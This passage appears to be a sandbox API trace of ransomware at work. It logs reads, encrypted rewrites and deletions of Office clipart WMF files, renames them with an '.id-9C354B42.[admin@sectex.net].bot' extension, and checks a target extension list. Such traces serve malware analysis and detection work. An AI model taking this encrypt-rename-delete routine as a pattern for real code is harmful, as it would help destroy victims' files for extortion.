	[0143.612] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.612] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01603_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0143.612] GetLastError () returned 0x0
	[0143.612] ReadFile (in: hFile=0x3cc, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1c08, lpOverlapped=0x0) returned 1
	[0143.641] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1c10, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1c10, lpOverlapped=0x0) returned 1
	[0143.642] ReadFile (in: hFile=0x3cc, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.642] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.642] SetEndOfFile (hFile=0x3c4) returned 1
	[0143.642] CloseHandle (hObject=0x3c4) returned 1
	[0143.642] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.642] SetEndOfFile (hFile=0x3cc) returned 1
	[0143.644] CloseHandle (hObject=0x3cc) returned 1
	[0143.644] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.644] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01603_.wmf")) returned 1
	[0143.645] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63
	[0143.645] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63
	[0143.645] lstrlenW (lpString=".doc") returned 4
	[0143.645] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.645] lstrlenW (lpString=".docx") returned 5
	[0143.645] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.645] lstrlenW (lpString=".pdf") returned 4
	[0143.645] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.645] lstrlenW (lpString=".xls") returned 4
	[0143.645] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.645] lstrlenW (lpString=".xlsx") returned 5
	[0143.645] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.645] lstrlenW (lpString=".ppt") returned 4
	[0143.645] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.645] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63
	[0143.645] lstrlenW (lpString=".zip") returned 4
	[0143.645] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.645] lstrlenW (lpString=".rar") returned 4
	[0143.645] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.645] lstrlenW (lpString=".bz2") returned 4
	[0143.645] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.645] lstrlenW (lpString=".7z") returned 3
	[0143.645] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.645] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63
	[0143.645] lstrlenW (lpString=".dbf") returned 4
	[0143.645] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.645] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63
	[0143.646] lstrlenW (lpString=".1cd") returned 4
	[0143.646] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63
	[0143.646] lstrlenW (lpString=".jpg") returned 4
	[0143.646] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63
	[0143.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63
	[0143.646] lstrlenW (lpString=".doc") returned 4
	[0143.646] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.646] lstrlenW (lpString=".docx") returned 5
	[0143.646] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.646] lstrlenW (lpString=".pdf") returned 4
	[0143.646] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.646] lstrlenW (lpString=".xls") returned 4
	[0143.646] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.646] lstrlenW (lpString=".xlsx") returned 5
	[0143.646] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.646] lstrlenW (lpString=".ppt") returned 4
	[0143.646] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63
	[0143.646] lstrlenW (lpString=".zip") returned 4
	[0143.646] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.646] lstrlenW (lpString=".rar") returned 4
	[0143.646] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.646] lstrlenW (lpString=".bz2") returned 4
	[0143.646] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.646] lstrlenW (lpString=".7z") returned 3
	[0143.646] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63
	[0143.646] lstrlenW (lpString=".dbf") returned 4
	[0143.646] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63
	[0143.646] lstrlenW (lpString=".1cd") returned 4
	[0143.646] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63
	[0143.647] lstrlenW (lpString=".jpg") returned 4
	[0143.647] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.647] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.647] lstrlenW (lpString="CLASSIC1.WMF") returned 12
	[0143.647] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.695] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=2422) returned 1
	[0143.695] CloseHandle (hObject=0x3b4) returned 1
	[0143.695] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf")) returned 0x20
	[0143.695] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.695] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.695] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0143.696] GetLastError () returned 0x0
	[0143.696] ReadFile (in: hFile=0x3b4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x976, lpOverlapped=0x0) returned 1
	[0143.697] WriteFile (in: hFile=0x3a0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x980, lpOverlapped=0x0) returned 1
	[0143.698] ReadFile (in: hFile=0x3b4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.698] WriteFile (in: hFile=0x3a0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.698] SetEndOfFile (hFile=0x3a0) returned 1
	[0143.702] CloseHandle (hObject=0x3a0) returned 1
	[0143.702] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.702] SetEndOfFile (hFile=0x3b4) returned 1
	[0143.704] CloseHandle (hObject=0x3b4) returned 1
	[0143.704] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.705] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf")) returned 1
	[0143.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63
	[0143.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63
	[0143.705] lstrlenW (lpString=".doc") returned 4
	[0143.705] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.705] lstrlenW (lpString=".docx") returned 5
	[0143.705] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0143.705] lstrlenW (lpString=".pdf") returned 4
	[0143.705] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.705] lstrlenW (lpString=".xls") returned 4
	[0143.705] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.705] lstrlenW (lpString=".xlsx") returned 5
	[0143.705] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0143.705] lstrlenW (lpString=".ppt") returned 4
	[0143.705] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63
	[0143.705] lstrlenW (lpString=".zip") returned 4
	[0143.705] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.705] lstrlenW (lpString=".rar") returned 4
	[0143.705] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.705] lstrlenW (lpString=".bz2") returned 4
	[0143.706] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.706] lstrlenW (lpString=".7z") returned 3
	[0143.706] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63
	[0143.706] lstrlenW (lpString=".dbf") returned 4
	[0143.706] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63
	[0143.706] lstrlenW (lpString=".1cd") returned 4
	[0143.706] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63
	[0143.706] lstrlenW (lpString=".jpg") returned 4
	[0143.706] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63
	[0143.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63
	[0143.706] lstrlenW (lpString=".doc") returned 4
	[0143.706] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.706] lstrlenW (lpString=".docx") returned 5
	[0143.706] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0143.706] lstrlenW (lpString=".pdf") returned 4
	[0143.706] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.706] lstrlenW (lpString=".xls") returned 4
	[0143.706] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.706] lstrlenW (lpString=".xlsx") returned 5
	[0143.706] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0143.706] lstrlenW (lpString=".ppt") returned 4
	[0143.706] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63
	[0143.706] lstrlenW (lpString=".zip") returned 4
	[0143.706] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.706] lstrlenW (lpString=".rar") returned 4
	[0143.706] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.706] lstrlenW (lpString=".bz2") returned 4
	[0143.706] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.707] lstrlenW (lpString=".7z") returned 3
	[0143.707] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63
	[0143.707] lstrlenW (lpString=".dbf") returned 4
	[0143.707] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63
	[0143.707] lstrlenW (lpString=".1cd") returned 4
	[0143.707] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63
	[0143.707] lstrlenW (lpString=".jpg") returned 4
	[0143.707] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.707] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.707] lstrlenW (lpString="CLIP.WMF") returned 8
	[0143.707] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.708] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=2262) returned 1
	[0143.708] CloseHandle (hObject=0x3b4) returned 1
	[0143.708] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf")) returned 0x20
	[0143.708] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.709] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.709] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.709] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0143.709] GetLastError () returned 0x0
	[0143.709] ReadFile (in: hFile=0x3b4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x8d6, lpOverlapped=0x0) returned 1
	[0143.711] WriteFile (in: hFile=0x3a0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x8e0, lpOverlapped=0x0) returned 1
	[0143.711] ReadFile (in: hFile=0x3b4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.711] WriteFile (in: hFile=0x3a0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0143.712] SetEndOfFile (hFile=0x3a0) returned 1
	[0143.712] CloseHandle (hObject=0x3a0) returned 1
	[0143.712] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.712] SetEndOfFile (hFile=0x3b4) returned 1
	[0143.714] CloseHandle (hObject=0x3b4) returned 1
	[0143.714] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.714] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf")) returned 1
	[0143.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59
	[0143.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59
	[0143.715] lstrlenW (lpString=".doc") returned 4
	[0143.715] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.715] lstrlenW (lpString=".docx") returned 5
	[0143.715] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1
	[0143.715] lstrlenW (lpString=".pdf") returned 4
	[0143.715] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.715] lstrlenW (lpString=".xls") returned 4
	[0143.715] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.715] lstrlenW (lpString=".xlsx") returned 5
	[0143.715] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1
	[0143.715] lstrlenW (lpString=".ppt") returned 4
	[0143.715] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59
	[0143.715] lstrlenW (lpString=".zip") returned 4
	[0143.715] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.715] lstrlenW (lpString=".rar") returned 4
	[0143.715] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.715] lstrlenW (lpString=".bz2") returned 4
	[0143.715] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.715] lstrlenW (lpString=".7z") returned 3
	[0143.715] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59
	[0143.715] lstrlenW (lpString=".dbf") returned 4
	[0143.716] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59
	[0143.716] lstrlenW (lpString=".1cd") returned 4
	[0143.716] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59
	[0143.716] lstrlenW (lpString=".jpg") returned 4
	[0143.716] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59
	[0143.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59
	[0143.716] lstrlenW (lpString=".doc") returned 4
	[0143.716] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.716] lstrlenW (lpString=".docx") returned 5
	[0143.716] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1
	[0143.716] lstrlenW (lpString=".pdf") returned 4
	[0143.716] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.716] lstrlenW (lpString=".xls") returned 4
	[0143.716] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.716] lstrlenW (lpString=".xlsx") returned 5
	[0143.716] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1
	[0143.716] lstrlenW (lpString=".ppt") returned 4
	[0143.716] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59
	[0143.716] lstrlenW (lpString=".zip") returned 4
	[0143.716] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.716] lstrlenW (lpString=".rar") returned 4
	[0143.716] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.716] lstrlenW (lpString=".bz2") returned 4
	[0143.716] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.716] lstrlenW (lpString=".7z") returned 3
	[0143.716] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59
	[0143.716] lstrlenW (lpString=".dbf") returned 4
	[0143.717] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.717] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59
	[0143.717] lstrlenW (lpString=".1cd") returned 4
	[0143.717] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.717] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59
	[0143.717] lstrlenW (lpString=".jpg") returned 4
	[0143.717] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.717] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.717] lstrlenW (lpString="CRANE.WMF") returned 9
	[0143.717] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0143.789] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=5270) returned 1
	[0143.789] CloseHandle (hObject=0x3c4) returned 1
	[0143.790] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf")) returned 0x20
	[0143.799] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.807] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.818] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.818] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
